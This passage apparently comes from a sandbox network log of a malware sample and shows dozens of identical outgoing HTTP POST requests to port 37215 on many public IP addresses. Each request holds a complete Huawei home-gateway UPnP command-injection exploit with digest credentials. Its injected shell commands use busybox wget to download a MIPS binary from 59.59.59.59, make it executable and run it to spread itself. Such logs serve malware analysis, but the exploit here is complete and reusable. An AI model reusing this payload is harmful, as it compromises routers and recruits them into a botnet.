                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1265192.168.2.155608041.103.159.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756597042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1266192.168.2.1558630197.174.64.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756637096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1267192.168.2.1541654197.186.32.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756656885 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1268192.168.2.1554140197.39.195.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756671906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1269192.168.2.1545124185.85.183.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.784028053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1270192.168.2.153338440.0.77.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.784051895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1271192.168.2.155941841.196.88.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.784099102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1272192.168.2.1535898157.67.215.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.784123898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1273192.168.2.1548640197.66.57.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.784178019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1274192.168.2.1551452196.86.123.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.809448004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
